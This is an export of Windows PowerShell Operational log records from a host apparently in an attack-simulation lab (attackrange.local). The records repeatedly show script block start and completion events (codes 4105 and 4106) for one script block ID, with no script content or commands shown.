ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472708
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472707
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472706
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472705
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472704
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472703
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472702
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472701
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472700
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472699
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472698
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472697
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472696
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472695
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472694
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472693
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472692
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472691
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472690
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472689
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472688
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472687
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472686
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472685
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472684
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472683
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472682
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472681
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472680
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472679
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472678
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472677
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472676
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472675
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472674
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472673
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472672
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472671
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472670
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472669
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472668
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472667
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472666
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472665
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472664
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472663
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472662
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472661
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472660
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472659
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472658
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472657
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472656
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472655
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472654
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
